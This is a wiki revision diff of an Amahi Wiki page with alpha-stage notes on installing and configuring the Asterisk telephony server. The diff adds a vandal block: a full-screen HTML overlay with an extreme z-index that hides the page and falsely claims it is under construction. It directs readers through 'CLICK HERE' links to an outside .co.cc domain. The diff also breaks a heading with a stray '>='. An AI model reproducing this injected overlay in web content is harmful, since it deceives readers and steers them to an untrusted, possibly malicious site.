Difference between revisions of "Asterisk"

From Amahi Wiki
Jump to: navigation, search
Line 5: Line 5:
 
     '''NOTE: This app is in ALPHA stage!'''
 
     '''NOTE: This app is in ALPHA stage!'''
  
= Asterisk Notes =
+
>= Asterisk Notes =
  
 
* due to the way the make file is written for asterisk it requires the kernel-devel files to be present and a link to them placed in /usr/src
 
* due to the way the make file is written for asterisk it requires the kernel-devel files to be present and a link to them placed in /usr/src
Line 17: Line 17:
  
 
*the asterisk-sounds package required for the echo test and voicemail may not be available due to licensing questions, but should be available from other sources or the Asterisk website as source to be unpacked into the proper directory (/usr/share/asterisk/sounds).
 
*the asterisk-sounds package required for the echo test and voicemail may not be available due to licensing questions, but should be available from other sources or the Asterisk website as source to be unpacked into the proper directory (/usr/share/asterisk/sounds).
 +
 +
----
 +
<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
 +
----
 +
=[http://oruwaci.co.cc This Page Is Currently Under Construction And Will Be Available Shortly, Please Visit Reserve Copy Page]=
 +
----
 +
=[http://oruwaci.co.cc CLICK HERE]=
 +
----
 +
</div>

Revision as of 22:07, 17 November 2010


Asterisk is a telephony engine and toolkit. It handles things like pbx (switching calls), and interactive voice response system (ivr), a voicemail system etc.

   NOTE: This app is in ALPHA stage!

>= Asterisk Notes =

  • due to the way the make file is written for asterisk it requires the kernel-devel files to be present and a link to them placed in /usr/src
  • the zaptel and asterisks makefile rely on this when performing an install from source
  • installing the common components from the repo currently works and provides a base Asterisk server which will need to be manually configured and started (yum install asterisk asterisk-alsa asterisk-voicemail asterisk-voicemail-plain)
  • note that installing all components will require more configuration of all of the individual components and *.conf files
  • the asterisk-sounds package required for the echo test and voicemail may not be available due to licensing questions, but should be available from other sources or the Asterisk website as source to be unpacked into the proper directory (/usr/share/asterisk/sounds).